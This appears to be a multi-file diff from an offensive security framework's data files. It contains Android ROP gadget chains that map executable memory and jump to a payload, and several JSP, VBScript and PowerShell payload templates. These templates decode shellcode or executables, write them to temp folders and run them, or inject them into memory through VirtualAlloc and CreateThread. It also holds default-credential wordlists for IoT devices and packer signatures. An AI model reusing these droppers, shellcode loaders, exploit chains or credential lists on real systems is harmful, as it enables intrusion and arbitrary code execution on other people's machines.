+signature = F0 40 2D E9 00 40 A0 E1 01 50 A0 E1 02 60 A0 E1 03 70 A0 E1 ?? 00 00 EB 07 30 A0 E1 06 20 A0 E1 05 10 A0 E1 04 00 A0 E1 ?? ?? ?? EB F0 40 BD E8 ?? 00 00 EA ?? 40 2D E9 ?? ?? 9F E5 ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? 9F E5 00 ?? ?? ?? ?? 00
+ep_only = True
+
+[Hide PE 1.01 -> BGCorp]
+signature = ?? BA ?? ?? ?? 00 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 04 B8 ?? ?? ?? ?? 89 02 83 C2 F8 FF E2 0D 0A 2D 3D 5B 20 48 69 64 65 50 45 20 62 79 20 42 47 43 6F 72 70 20 5D 3D 2D
+ep_only = True
+
+[VMProtect 0.7x - 0.8 -> PolyTech]
+signature = 5B 20 56 4D 50 72 6F 74 65 63 74 20 76 20 30 2E 38 20 28 43 29 20 50 6F 6C 79 54 65 63 68 20 5D
+ep_only = False
+
+[PE Crypt 1.5 -> BitShape Software]
+signature = 60 E8 00 00 00 00 5D 81 ED 55 20 40 00 B9 7B 09 00 00 8D BD 9D 20 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = True
+
+[LameCrypt -> LaZaRus]
+signature = 60 66 9C BB 00 ?? ?? 00 80 B3 00 10 40 00 90 4B 83 FB FF 75 F3 66 9D 61 B8 ?? ?? 40 00 FF E0
+ep_only = True
+
+[PeX 0.99 -> bart^CrackPl]
+signature = E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4
+ep_only = True
+
+[Obsidium 1.2.0.0 -> Obsidium Software]
+signature = EB 02 ?? ?? E8 3F 1E 00 00
+ep_only = True
+
+[Ste@lth PE 1.01 -> BGCorp]
+signature = ?? ?? ?? ?? ?? BA ?? ?? ?? 00
+ep_only = True
+
+[GCC-Win32 / XMINGW]
+signature = 55 89 e5 83 ec 08 c7 04 24 01 00 00 00
+ep_only = False
+
@@ -1,62 +0,0 @@
-On Error Resume Next
-
-Function WindowsZip(sFile, sZipFile)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oZipShell = CreateObject("WScript.Shell")  
-  Set oZipFSO = CreateObject("Scripting.FileSystemObject")
-  
-  If Not oZipFSO.FileExists(sZipFile) Then
-    NewZip(sZipFile)
-  End If
-
-  Set oZipApp = CreateObject("Shell.Application")
-  
-  sZipFileCount = oZipApp.NameSpace(sZipFile).items.Count
-
-  aFileName = Split(sFile, "\")
-  sFileName = (aFileName(Ubound(aFileName)))
-  
-  'listfiles
-  sDupe = False
-  For Each sFileNameInZip In oZipApp.NameSpace(sZipFile).items
-    If LCase(sFileName) = LCase(sFileNameInZip) Then
-      sDupe = True
-      Exit For
-    End If
-  Next
-  
-  If Not sDupe Then
-    oZipApp.NameSpace(sZipFile).Copyhere sFile
-
-    'Keep script waiting until Compressing is done
-    On Error Resume Next
-    sLoop = 0
-    Do Until sZipFileCount < oZipApp.NameSpace(sZipFile).Items.Count
-      Wscript.Sleep(100)
-      sLoop = sLoop + 1
-    Loop
-    On Error GoTo 0
-  End If
-End Function
-
-Sub NewZip(sNewZip)
-  'This script is provided under the Creative Commons license located
-  'at http://creativecommons.org/licenses/by-nc/2.5/ . It may not
-  'be used for commercial purposes with out the expressed written consent
-  'of NateRice.com
-
-  Set oNewZipFSO = CreateObject("Scripting.FileSystemObject")
-  Set oNewZipFile = oNewZipFSO.CreateTextFile(sNewZip)
-    
-  oNewZipFile.Write Chr(80) & Chr(75) & Chr(5) & Chr(6) & String(18, 0)
-  
-  oNewZipFile.Close
-  Set oNewZipFSO = Nothing
-
-  Wscript.Sleep(500)
-End Sub
-
@@ -1,225 +0,0 @@
-<?xml version="1.0" encoding="ISO-8859-1"?>
-<db>
-<rop>
-	<compatibility>
-		<target>lrx</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x00058e63">pop {r4, pc}</gadget>
-		<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0002fed3">bx r0</gadget>
-	</gadgets>
-</rop>
-
-<rop>
-	<compatibility>
-		<target>lmy-1</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000f379">pop {r4, pc}</gadget>
-		<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x000301a5">bx r0</gadget>
-	</gadgets>
-</rop>
-
-<rop>
-	<compatibility>
-		<target>lmy-2</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000f379">pop {r4, pc}</gadget>
-		<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000b3bd">bx r0</gadget>
-	</gadgets>
-</rop>
-
-<rop>
-	<compatibility>
-		<target>shamu / LYZ28E</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x00044f71">pop {r4, pc}</gadget>
-		<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000f7cd">bx r0</gadget>
-	</gadgets>
-</rop>
-
-<rop>
-	<compatibility>
-		<target>shamu / LYZ28J</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x00044f71">pop {r4, pc}</gadget>
-		<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000f83d">bx r0</gadget>
-	</gadgets>
-</rop>
-
-<rop>
-	<compatibility>
-		<target>sm-g900v / OE1</target>
-	</compatibility>
-
-	<gadgets base="0xb66a0000">
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
-		<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
-		<gadget value="0x00001000">mmap64 length (1 page)</gadget>
-		<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
-		<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
-		<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="0xffffffff">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 fd</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x00065467">pop {r4, pc}</gadget>
-		<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
-		<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
-		<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
-		<gadget value="size">memcpy length (payload size)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
-		<gadget value="junk">value to be skipped (r3)</gadget>
-		<gadget value="junk">value to be skipped (r4)</gadget>
-		<gadget value="junk">value to be skipped (r5)</gadget>
-		<gadget value="junk">value to be skipped (r6)</gadget>
-		<gadget value="junk">value to be skipped (r7)</gadget>
-		<gadget offset="0x0000c409">bx r0</gadget>
-	</gadgets>
-</rop>
-
-</db>
@@ -1,38 +0,0 @@
-<%%@ page import="java.io.*" %%>
-<%%
-  String %{var_payload} = "%{payload}";
-  String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
-
-  if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) {
-    %{var_exepath} = %{var_exepath}.concat(".exe");
-  }
-
-  int %{var_payloadlength} = %{var_payload}.length();
-  byte[] %{var_bytes} = new byte[%{var_payloadlength}/2];
-  for (int %{var_counter} = 0; %{var_counter} < %{var_payloadlength}; %{var_counter} += 2) {
-    %{var_bytes}[%{var_counter} / 2] = (byte) ((Character.digit(%{var_payload}.charAt(%{var_counter}), 16) << 4)
-                                              + Character.digit(%{var_payload}.charAt(%{var_counter}+1), 16));
-  }
-
-  FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
-  %{var_outputstream}.write(%{var_bytes});
-  %{var_outputstream}.flush();
-  %{var_outputstream}.close();
-
-  if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
-    String[] %{var_fperm} = new String[3];
-    %{var_fperm}[0] = "chmod";
-    %{var_fperm}[1] = "+x";
-    %{var_fperm}[2] = %{var_exepath};
-    Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
-    if (%{var_proc}.waitFor() == 0) {
-      %{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
-    }
-
-    File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
-  } else {
-    String[] %{var_exepatharray} = new String[1];
-    %{var_exepatharray}[0] = %{var_exepath};
-    Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
-  }
-%%>
@@ -1,31 +1,23 @@
-Function %{var_decodefunc}(%{var_decodebase64})
-	%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
-		"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
-		%{var_decodebase64} & "</B64DECODE>"
-	Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
-	%{var_xmldoc}.LoadXML(%{var_xml})
-	%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
-	set %{var_xmldoc} = nothing
-End Function
-
 Function %{var_func}()
-	%{var_shellcode} = "%{base64_shellcode}"
+	%{var_shellcode} = "%{hex_shellcode}"
+
 	Dim %{var_obj}
 	Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
+	Dim %{var_stream}
 	Dim %{var_tempdir}
+	Dim %{var_tempexe}
 	Dim %{var_basedir}
 	Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 	%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 	%{var_obj}.CreateFolder(%{var_basedir})
 	%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
+	Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
+	For i = 1 to Len(%{var_shellcode}) Step 2
+	    %{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
+	Next
+	%{var_stream}.Close
 	Dim %{var_shell}
 	Set %{var_shell} = CreateObject("Wscript.Shell")
-	%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
-	Set %{var_adodbstream} = CreateObject("ADODB.Stream")
-	%{var_adodbstream}.Type = 1
-	%{var_adodbstream}.Open
-	%{var_adodbstream}.Write %{var_decoded}
-	%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 	%{var_shell}.run %{var_tempexe}, 0, true
 	%{var_obj}.DeleteFile(%{var_tempexe})
 	%{var_obj}.DeleteFolder(%{var_basedir})
@@ -0,0 +1,51 @@
+<%%@ page import="java.io.*" %%>
+<%%
+	String %{var_hexpath} = application.getRealPath("/") + "/%{var_hexfile}.txt";
+	String %{var_exepath} = System.getProperty("java.io.tmpdir") + "/%{var_exe}";
+	String %{var_data} = "";
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
+	{
+		%{var_exepath} = %{var_exepath}.concat(".exe");
+	}
+
+	FileInputStream %{var_inputstream} = new FileInputStream(%{var_hexpath});
+	FileOutputStream %{var_outputstream} = new FileOutputStream(%{var_exepath});
+
+	int %{var_numbytes} = %{var_inputstream}.available();
+	byte %{var_bytearray}[] = new byte[%{var_numbytes}];
+	%{var_inputstream}.read(%{var_bytearray});
+	%{var_inputstream}.close();
+	byte[] %{var_bytes} = new byte[%{var_numbytes}/2];
+	for (int %{var_counter} = 0; %{var_counter} < %{var_numbytes}; %{var_counter} += 2)
+	{
+		char %{var_char1} = (char) %{var_bytearray}[%{var_counter}];
+		char %{var_char2} = (char) %{var_bytearray}[%{var_counter} + 1];
+		int %{var_comb} = Character.digit(%{var_char1}, 16) & 0xff;
+		%{var_comb} <<= 4;
+		%{var_comb} += Character.digit(%{var_char2}, 16) & 0xff;
+		%{var_bytes}[%{var_counter}/2] = (byte)%{var_comb};
+	}
+
+	%{var_outputstream}.write(%{var_bytes});
+	%{var_outputstream}.close();
+
+	if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1){
+		String[] %{var_fperm} = new String[3];
+		%{var_fperm}[0] = "chmod";
+		%{var_fperm}[1] = "+x";
+		%{var_fperm}[2] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_fperm});
+		if (%{var_proc}.waitFor() == 0) {
+			%{var_proc} = Runtime.getRuntime().exec(%{var_exepath});
+		}
+
+		File %{var_fdel} = new File(%{var_exepath}); %{var_fdel}.delete();
+	}
+	else
+	{
+		String[] %{var_exepatharray} = new String[1];
+		%{var_exepatharray}[0] = %{var_exepath};
+		Process %{var_proc} = Runtime.getRuntime().exec(%{var_exepatharray});
+	}
+%%>
@@ -0,0 +1,30 @@
+Set-StrictMode -Version 2
+$%{var_syscode} = @"
+	using System;
+	using System.Runtime.InteropServices;
+	namespace %{var_kernel32} {
+		public class func {
+			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+		}
+	}
+"@
+
+$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
+$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
+$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
+$%{var_compileParams}.GenerateInMemory = $True
+$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+
+$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
+if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
+[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
+if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
+$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)
@@ -0,0 +1,20 @@
+$%{var_syscode} = @"
+[DllImport("kernel32.dll")]
+public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+[DllImport("kernel32.dll")]
+public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+[DllImport("msvcrt.dll")]
+public static extern IntPtr memset(IntPtr dest, uint src, uint count);
+"@
+
+$%{var_win32_func} = Add-Type -memberDefinition $%{var_syscode} -Name "Win32" -namespace Win32Functions -passthru
+
+%{shellcode}
+
+$%{var_rwx} = $%{var_win32_func}::VirtualAlloc(0,[Math]::Max($%{var_code}.Length,0x1000),0x3000,0x40)
+
+for ($%{var_iter}=0;$%{var_iter} -le ($%{var_code}.Length-1);$%{var_iter}++) {
+  $%{var_win32_func}::memset([IntPtr]($%{var_rwx}.ToInt32()+$%{var_iter}), $%{var_code}[$%{var_iter}], 1) | Out-Null
+}
+
+$%{var_win32_func}::CreateThread(0,0,$%{var_rwx},0,0,0)
@@ -0,0 +1,27 @@
+function %{func_get_proc_address} {
+	Param ($%{var_module}, $%{var_procedure})		
+	$%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
+	
+	return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}))
+}
+
+function %{func_get_delegate_type} {
+	Param (
+		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+		[Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
+	)
+	
+	$%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
+	$%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	$%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed')
+	
+	return $%{var_type_builder}.CreateType()
+}
+
+[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
+		
+$%{var_buffer} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll VirtualAlloc), (%{func_get_delegate_type} @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $%{var_code}.Length,0x3000, 0x40)
+[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_buffer}, $%{var_code}.length)
+
+$%{var_hthread} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll CreateThread), (%{func_get_delegate_type} @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$%{var_buffer},[IntPtr]::Zero,0,[IntPtr]::Zero)
+[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((%{func_get_proc_address} kernel32.dll WaitForSingleObject), (%{func_get_delegate_type} @([IntPtr], [Int32]))).Invoke($%{var_hthread},0xffffffff) | Out-Null
@@ -50,7 +50,7 @@ shdr:
  dd    0                          ; sh_link
  dd    0                          ; sh_info
  dq    8                          ; sh_addralign
-  dq    7                          ; sh_entsize
+  dq    dynsz                      ; sh_entsize
 shentsize equ $ - shdr
  dd    0                          ; sh_name
  dd    3                          ; sh_type = SHT_STRTAB
@@ -66,6 +66,9 @@ dynsection:
 ; DT_INIT
  dq    0x0c
  dq    _start
+; DT_HASH
+  dq    0x04
+  dq    0
 ; DT_STRTAB
  dq    0x05
  dq    strtab
@@ -74,7 +77,7 @@ dynsection:
  dq    strtab
 ; DT_STRSZ
  dq    0x0a
-  dq    0
+  dq    strtabsz
 ; DT_SYMENT
  dq    0x0b
  dq    0
@@ -4722,4 +4722,3 @@ zxcvbn
 zxcvbnm
 zzzz
 zzzzzz
-vagrant
@@ -1212,33 +1212,3 @@ SQL
 CMOSPWD
 dadmin
 wlcsystem
-vagrant
-xc3511
-vizxv
-888888
-xmhdipc
-juantech
-54321
-666666
-klv123
-service
-666666
-888888
-ubnt
-klv1234
-Zte521
-hi3518
-jvbzd
-anko
-zlxx.
-7ujMko0vizxv
-7ujMko0admin
-ikwb
-dreambox
